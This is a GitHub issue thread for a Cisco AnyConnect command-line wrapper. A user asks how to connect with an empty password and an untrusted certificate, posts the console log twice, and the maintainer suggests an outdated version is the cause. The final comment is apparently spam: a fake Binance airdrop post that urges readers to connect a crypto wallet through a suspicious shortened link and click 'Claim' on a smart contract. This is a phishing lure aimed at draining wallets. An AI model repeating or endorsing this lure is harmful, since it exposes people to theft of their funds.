### ISSUE TITLE
Q about non-password login

### ISSUE THREAD

**Issue by CiE-XinYuChen** [hacki11/cisco-anyconnect-cli#10]
Good project！ But how could i log in server with non-password？

**Comment by CiE-XinYuChen** [comment]
For more, I have in trouble.

PS C:\Users\13102\python\panyc> anyconnect connect ******:443 -u *** -p "" --insecure
[INFO ] Using C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpncli.exe
[INFO ] Connecting to '209.141.36.27:443' as '*****'
[DEBUG] Cisco AnyConnect Secure Mobility Client (version 4.10.05111) .

Copyright (c) 2004 - 2022 Cisco Systems, Inc.  All Rights Reserved.


  >> state: Disconnected
  >> state: Disconnected
  >> notice: Ready to connect.
  >> registered with local VPN subsystem.
  >> contacting host (*******) for login information...
  >> notice: Contacting *******.
AnyConnect cannot verify server: *******
    - Certificate is from an untrusted source.
Connecting to this server may result in a severe security compromise!

Most users do not connect to untrusted servers unless the reason for the error condition is known.

Connect Anyway? [y/n]: admin3
  >> warning: Connection attempt has failed.
  >> state: Disconnected

there are two que:
1. I use special portal. Did grammar correct?
2. I have non-password. did using correct?
3. I login with insecure server.

**Comment by CiE-XinYuChen** [comment]
For more, I have in trouble.
```

PS C:\Users\13102\python\panyc> anyconnect connect ******:443 -u *** -p "" --insecure
[INFO ] Using C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpncli.exe
[INFO ] Connecting to '209.141.36.27:443' as '*****'
[DEBUG] Cisco AnyConnect Secure Mobility Client (version 4.10.05111) .

Copyright (c) 2004 - 2022 Cisco Systems, Inc.  All Rights Reserved.


  >> state: Disconnected
  >> state: Disconnected
  >> notice: Ready to connect.
  >> registered with local VPN subsystem.
  >> contacting host (*******) for login information...
  >> notice: Contacting *******.
AnyConnect cannot verify server: *******
    - Certificate is from an untrusted source.
Connecting to this server may result in a severe security compromise!

Most users do not connect to untrusted servers unless the reason for the error condition is known.

Connect Anyway? [y/n]: admin3
  >> warning: Connection attempt has failed.
  >> state: Disconnected

```
there are two que:
1. I use special portal. Did grammar correct?
2. I have non-password. did using correct?
3. I login with insecure server.

**Comment by CiE-XinYuChen** [comment]
oh my math is in trouble as same. That is three question.

**Comment by hacki11** [comment]
I will have a look but may I have a question. Why are you using VPN at all if you don't have a password and trust insecure certificate? You could also just use no vpn at all regarding security.

**Comment by CiE-XinYuChen** [comment]
Oh, haha. It is a little bit complex that my team share same server and username , For convenient we set non-passwd at first.If I have no access to set up a new username because I am not admin. It seem not secure so that we change to unnormal portal. Actually we use VPN to avoid government limit in China mainland, Not for secure.

**Comment by CiE-XinYuChen** [comment]
Yes. You;re right. Maybe sometimes no password is the best passwd.

**Comment by CiE-XinYuChen** [comment]
One more is that we set up server for CS not illegal or crime, Just for research and study. Chinese mainland government block global internet access requirement and use global internet directly. In China, lots of people using VPN for access global internet.

**Comment by hacki11** [comment]
It looks like you didn't use the latest version. That's exactly how the last issue looked like where instead of 'Y' for accepting insecure connections the user name is used. But then it is strange, why it doesn't complain about the cli argument --insecure.  Can you verify if you are using the latest version v0.6?

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @
